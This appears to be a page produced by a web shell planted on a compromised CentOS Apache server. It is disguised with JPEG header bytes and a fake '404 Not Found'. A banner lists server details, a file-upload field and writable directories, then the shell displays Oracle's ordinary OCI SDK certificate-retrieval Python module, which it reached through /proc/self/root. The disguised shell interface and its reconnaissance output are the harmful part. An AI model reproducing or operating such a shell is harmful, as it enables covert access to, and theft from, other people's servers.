����JFIF��� ( %"1"%)+...383,7(-.- 404 Not Found
Sh3ll
OdayForums


Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.20
System : Linux st2.domain.com 3.10.0-1127.10.1.el7.x86_64 #1 SMP Wed Jun 3 14:28:03 UTC 2020 x86_64
User : apache ( 48)
PHP Version : 7.4.20
Disable Function : NONE
Directory :  /proc/self/root/usr/share/mysqlsh/oci_sdk/oci/auth/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //proc/self/root/usr/share/mysqlsh/oci_sdk/oci/auth/certificate_retriever.py
# coding: utf-8
# Copyright (c) 2016, 2020, Oracle and/or its affiliates. All rights reserved.

from cryptography import x509
from cryptography.hazmat.backends import default_backend
from oci._vendor import requests

import oci.retry
import os.path
from oci._vendor import six
import threading

# A retry strategy for use when calling the metadata endpoint on an instance to retrieve certificates. This retry strategy
# will retry on any exception (the metadata endpoint does not throw errors like an OCI service) up to 5 times or a max
# of 5 minutes
INSTANCE_METADATA_URL_CERTIFICATE_RETRIEVER_RETRY_STRATEGY = oci.retry.RetryStrategyBuilder().add_max_attempts() \
                                                                                             .add_total_elapsed_time() \
                                                                                             .get_retry_strategy()


# An abstract class which defines the interface via which certificates (and their corresponding private key) can be retrieved.
# Implementors should define their own concrete fetching mechanism (e.g. a URL, from a file, from provided PEM-format strings)
# but they are expected to be able to vend information in various ways:
#
#   - A dictionary containing all certificate and private key information. This is defined as:
#       - certificate: the certificate PEM string
#       - private_key_pem: the private key PEM string
#       - private_key: the private key as a cryptography.io X509 certificate object
#   - The certificate as a cryptography.io X509 certificate object
#   - The certificate PEM string
#   - The private key PEM string
#   - The private key as a cryptography.io X509 certificate object
#
# Certificates are optionally refreshable via a refresh() method. Where the refresh may not make sense (e.g. if the PEM-format strings
# are provided directly), implementors should make refersh() a no-op rather than throwing an exception.
class AbstractCertificateRetriever(object):
    def __init__(self, **kwargs):
        self.certificate_and_private_key = {
            'certificate': None,
            'private_key_pem': None,
            'private_key': None
        }

    # Refreshes the certificates held by this object (e.g. because they have been rotated)
    def refresh(self):
        raise NotImplementedError('Subclasses should implement this')

    # Returns the certificate_and_private_key dictionary contained by this object
    def get_certificate_and_private_key(self):
        raise NotImplementedError('Subclasses should implement this')

    # Retrieves the certificate as a cryptography.x509.Certificate
    def get_certificate_as_certificate(self):
        raise NotImplementedError('Subclasses should implement this')

    # Retrieves a string containing the certificate contents
    def get_certificate_raw(self):
        raise NotImplementedError('Subclasses should implement this')

    # Retrievea a string containing the PEM-encoded private key
    def get_private_key_pem(self):
        raise NotImplementedError('Subclasses should implement this')

    # Retrieves the private key as a cryptography private key
    def get_private_key(self):
        raise NotImplementedError('Subclasses should implement this')


class UrlBasedCertificateRetriever(AbstractCertificateRetriever):
    """
    A certificate retriever which reads PEM-format strings from URLs.

    :param str certificate_url:
        The URL from which to retrieve a certificate. It is assumed that what we retrieve is the PEM-formatted string for the certificate.
        This is mandatory

    :param str private_key_url: (optional)
        The URL from which to retrieve the private key corresponding to certificate_url (if any). It is assumed that what we retrieve is the PEM-formatted string for
        the private key.

    :param str passphrase: (optional)
        The passphrase of the private key (if any).

    :param obj retry_strategy: (optional)
        A retry strategy to use when retrieving the certificate and private key from the URLs provided to this class. This should be one of the strategies available in
        the :py:mod:`~oci.retry` module. By default this retriever will not perform any retries.
    """

    READ_CHUNK_BYTES = 1024 * 1024  # A mebibyte

    def __init__(self, **kwargs):
        super(UrlBasedCertificateRetriever, self).__init__()

        if 'certificate_url' not in kwargs:
            raise TypeError('certificate_url must be supplied as a keyword argument')

        self.cert_url = kwargs['certificate_url']
        self.private_key_url = kwargs.get('private_key_url')
        self.passphrase = kwargs.get('passphrase')
        self.retry_strategy = kwargs.get('retry_strategy')

        if self.passphrase and isinstance(self.passphrase, six.text_type):
            self.passphrase = self.passphrase.encode('ascii')

        self._refresh_lock = threading.Lock()
        self.requests_session = requests.Session()
        if kwargs.get('headers', None):
            self.requests_session.headers.update(kwargs.get('headers'))

        self.refresh()

    def refresh(self):
        self._refresh_lock.acquire()
        try:
            if self.retry_strategy:
                self.retry_strategy.make_retrying_call(self._refresh_inner)
            else:
                self._refresh_inner()
        finally:
            self._refresh_lock.release()

    def get_certificate_and_private_key(self):
        self._refresh_lock.acquire()
        ret_val = self.certificate_and_private_key.copy()
        self._refresh_lock.release()

        return ret_val

    def get_certificate_as_certificate(self):
        raw_cert = self.get_certificate_raw()
        if raw_cert:
            return x509.load_pem_x509_certificate(raw_cert, default_backend())
        else:
            return None

    def get_certificate_raw(self):
        self._refresh_lock.acquire()
        certificate = self.certificate_and_private_key.copy()['certificate']
        self._refresh_lock.release()

        return certificate

    def get_private_key_pem(self):
        self._refresh_lock.acquire()
        private_key = self.certificate_and_private_key.copy()['private_key_pem']
        self._refresh_lock.release()

        return private_key

    def get_private_key(self):
        self._refresh_lock.acquire()
        private_key = self.certificate_and_private_key.copy()['private_key']
        self._refresh_lock.release()

        return private_key

    def _refresh_inner(self):
        """
        Refreshes the certificate and its corresponding private key (if there is one defined for this retriever).
        This method represents the unit of retrying for the certificate retriever. It is intentionally coarse
        grained (e.g. if we retrieve the certificate but fail to retrieve the private key then we'll retry and
        retrieve both the certificate and private key again) to try and best maintain consistency in the data.

        For example, if we had separate retries for the certificate and the private key, in the scenario where
        a certificate was successfully retrieved but the private key failed, the private key we successfully
        retrieved upon retry may not relate to the certificate that we retrieved (e.g. because of rotation). This
        is still a risk in coarse grained retries, but hopefully a smaller one.
        """
        import oci.signer

        downloaded_certificate = six.BytesIO()
        response = self.requests_session.get(self.cert_url, stream=True, timeout=(10, 60))

        response.raise_for_status()

        for chunk in response.raw.stream(self.READ_CHUNK_BYTES, decode_content=False):
            downloaded_certificate.write(chunk)

        self.certificate_and_private_key['certificate'] = downloaded_certificate.getvalue().strip()
        downloaded_certificate.close()
        if isinstance(self.certificate_and_private_key['certificate'], six.text_type):
            self.certificate_and_private_key['certificate'] = self.certificate_and_private_key['certificate'].encode('ascii')

        self._check_valid_certificate_string(self.certificate_and_private_key['certificate'])

        if self.private_key_url:
            downloaded_private_key_raw = six.BytesIO()
            response = self.requests_session.get(self.private_key_url, stream=True, timeout=(10, 60))

            response.raise_for_status()

            for chunk in response.raw.stream(self.READ_CHUNK_BYTES, decode_content=False):
                downloaded_private_key_raw.write(chunk)

            self.certificate_and_private_key['private_key_pem'] = downloaded_private_key_raw.getvalue().strip()
            downloaded_private_key_raw.close()

            if isinstance(self.certificate_and_private_key['private_key_pem'], six.text_type):
                self.certificate_and_private_key['private_key_pem'] = self.certificate_and_private_key['private_key_pem'].encode('ascii')

            try:
                self.certificate_and_private_key['private_key'] = oci.signer.load_private_key(
                    self.certificate_and_private_key['private_key_pem'],
                    self.passphrase
                )
            except oci.exceptions.InvalidPrivateKey:
                raise InvalidCertificateFromInstanceMetadataError(
                    certificate_type='private_key',
                    certificate_raw=self.certificate_and_private_key['private_key_pem']
                )

    def _check_valid_certificate_string(self, certificate_string_to_check):
        """
        Determines whether a given string is a valid certificate. Valid in this context means that it
        can be parsed into a cryptography.io X509 certificate object. If the string is not valid then
        this method will throw an exception.

        :param str certificate_string_to_check:
            The certificate string to check. If it is valid then it should be a PEM-formatted string
            and able to be parsed into a cryptography.io X509 certificate object
        """
        try:
            x509.load_pem_x509_certificate(certificate_string_to_check, default_backend())
        except ValueError:
            raise InvalidCertificateFromInstanceMetadataError(
                certificate_type='certificate',
                certificate_raw=certificate_string_to_check
            )


class PEMStringCertificateRetriever(AbstractCertificateRetriever):
    """
    A certificate retriever which is provided PEM format strings directly. This retriever is non-refreshable, and calling refresh() is a no-op.

    :param str certificate_pem:
        The PEM-formatted string of the certificate. This is mandatory.

    :param str private_key_pem (optional):
        The PEM-formatted string of the private key corresponding to certificate_pem (if any).

    :param str passphrase (optional):
        The passphrase of the private key (if any).
    """

    def __init__(self, **kwargs):
        import oci.signer

        super(PEMStringCertificateRetriever, self).__init__()

        if 'certificate_pem' not in kwargs:
            raise TypeError('certificate_pem must be supplied as a keyword argument')

        if isinstance(kwargs['certificate_pem'], six.text_type):
            self.certificate_and_private_key['certificate'] = kwargs['certificate_pem'].encode('ascii')
        else:
            self.certificate_and_private_key['certificate'] = kwargs['certificate_pem']

        if 'private_key_pem' in kwargs and kwargs['private_key_pem']:
            if isinstance(kwargs['private_key_pem'], six.text_type):
                self.certificate_and_private_key['private_key_pem'] = kwargs['private_key_pem'].encode('ascii')
            else:
                self.certificate_and_private_key['private_key_pem'] = kwargs['private_key_pem']

            if 'passphrase' in kwargs and kwargs['passphrase']:
                passphrase = kwargs['passphrase'].encode('ascii')
            else:
                passphrase = None

            self.certificate_and_private_key['private_key'] = oci.signer.load_private_key(
                self.certificate_and_private_key['private_key_pem'],
                passphrase
            )

    def refresh(self):
        # Since these are just the string, there is no refresh as such. A new object should be created
        # if the strings change
        pass

    def get_certificate_and_private_key(self):
        return self.certificate_and_private_key.copy()

    def get_certificate_as_certificate(self):
        return x509.load_pem_x509_certificate(self.certificate_and_private_key['certificate'], default_backend())

    def get_certificate_raw(self):
        return self.certificate_and_private_key['certificate']

    def get_private_key_pem(self):
        return self.certificate_and_private_key['private_key_pem']

    def get_private_key(self):
        return self.certificate_and_private_key['private_key']


class FileBasedCertificateRetriever(PEMStringCertificateRetriever):
    """
    A specialization of PEMStringCertificateRetriever which reads certificates from a file. This retriever is non-refreshable, and calling refresh() is a no-op.

    :param str certificate_file_path:
        The file path from which to retrieve a certificate. It is assumed that what we retrieve is the PEM-formatted string for the certificate.
        This is mandatory

    :param str private_key_pem_file_path (optional):
        The file path from which to retrieve the private key corresponding to certificate_file_path (if any). It is assumed that what we retrieve is the PEM-formatted string for
        the private key.

    :param str passphrase (optional):
        The passphrase of the private key (if any).

    """

    def __init__(self, **kwargs):
        if 'certificate_file_path' not in kwargs:
            raise TypeError('certificate_file_path must be supplied as a keyword argument')

        if 'private_key_pem_file_path' in kwargs:
            private_key_pem = self._load_data_from_file(kwargs['private_key_pem_file_path'])
        else:
            private_key_pem = None

        parent_class_kwargs = {
            'certificate_pem': self._load_data_from_file(kwargs['certificate_file_path']),
            'private_key_pem': private_key_pem,
            'passphrase': kwargs.get('passphrase')
        }

        super(FileBasedCertificateRetriever, self).__init__(**parent_class_kwargs)

    def _load_data_from_file(self, filename):
        filename = os.path.expanduser(filename)
        with open(filename, mode="rb") as f:
            cert_data = f.read().strip()

        return cert_data


class InvalidCertificateFromInstanceMetadataError(Exception):
    def __init__(self, certificate_type='certificate', certificate_raw=None):
        self.certificate_raw = certificate_raw
        self.certificate_type = certificate_type
        super(InvalidCertificateFromInstanceMetadataError, self).__init__({
            'message': 'Invalid certificate returned from instance metadata. Expected a PEM-formatted string',
            'certificate_type': self.certificate_type,
            'certificate_raw': self.certificate_raw
        })

ZeroDay Forums Mini